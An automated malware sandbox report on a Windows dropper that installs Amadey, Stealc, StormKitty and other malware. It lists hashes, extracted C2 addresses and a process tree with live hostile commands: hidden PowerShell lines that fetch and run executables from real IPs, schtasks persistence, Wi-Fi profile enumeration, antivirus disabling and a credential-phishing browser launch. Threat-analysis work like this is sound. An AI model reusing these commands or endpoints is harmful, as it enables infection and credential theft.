Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 01:21

General

  • Target

    8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe

  • Size

    938KB

  • MD5

    100bd6bacfe8cde2b3d01379c45e9282

  • SHA1

    5af8a1c8556ee19da4a43d1c9a5fced8960fb751

  • SHA256

    8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c

  • SHA512

    b6e02ef0adde68a5dcbd707c8bbb4dd0ff705c48b53cc5b4d1ff4a6eec772668a2c80ee1a61bd6d9906a8ab9412ea7904d293281de4ad3afff5b782e444600ef

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8aylF:VTvC/MTQYxsWR7ayl

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 16 IoCs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
    "C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1728
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
          "C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:796
            • C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
              "C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4028
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4008
              • C:\Users\Admin\AppData\Local\Temp\Build.exe
                "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                7⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:2848
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3152
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:3040
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show profile
                    9⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2804
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr All
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1564
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 2436
                  8⤵
                  • Program crash
                  PID:2304
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4408
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1728
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show networks mode=bssid
                    9⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1548
            • C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe
              "C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4936
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2796
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3272
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:684
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4960
                  • C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE
                    "C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1116
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1492
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4224
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4072
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4408
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4492
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4084
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1880
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "nVw3zmaCugA" /tr "mshta \"C:\Temp\C5jLSyw6s.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3152
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\C5jLSyw6s.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2760
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1180
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4148
            • C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe
              "C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"
              6⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2100
            • C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe
              "C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4904
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:4168
            • C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe
              "C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:636
              • C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe
                "C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1716
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 812
                7⤵
                • Program crash
                PID:2488
            • C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe
              "C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:684
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:2392
            • C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe
              "C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5008
            • C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe
              "C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4288
              • C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe
                "C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:1536
            • C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe
              "C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:1120
            • C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe
              "C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:3464
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4156
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4408
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4824
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3832
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4072
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:4844
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:516
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ce29bd-a2c1-456e-834c-16e7269aea66} 516 "\\.\pipe\gecko-crash-server-pipe.516" gpu
                      9⤵
                        PID:2132
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29b4fb96-3fad-4f8d-825b-c9ea27b67642} 516 "\\.\pipe\gecko-crash-server-pipe.516" socket
                        9⤵
                          PID:1356
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d81acd-b0ac-488c-9bd1-6850e7e56064} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab
                          9⤵
                            PID:2804
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3996 -prefMapHandle 2688 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0a590be-7e65-47bb-9696-7822e28e5ab3} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab
                            9⤵
                              PID:1256
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4816 -prefsLen 32778 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9282c8f-b678-4fb1-aa67-3efc0a53833e} 516 "\\.\pipe\gecko-crash-server-pipe.516" utility
                              9⤵
                              • Checks processor information in registry
                              PID:5152
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 4112 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f096e554-6c1f-47a8-98ef-03b0431cc8eb} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab
                              9⤵
                                PID:5532
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fe5da7-af72-4a22-af82-e6dd375f31b9} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab
                                9⤵
                                  PID:5548
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5660 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01a0b816-5676-4415-a553-ece2a9d8eabd} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab
                                  9⤵
                                    PID:5564
                            • C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5848
                            • C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:1424
                            • C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe
                              "C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"
                              6⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:5288
                              • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:5440
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2848 -ip 2848
                    1⤵
                      PID:4196
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 636 -ip 636
                      1⤵
                        PID:4588
                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
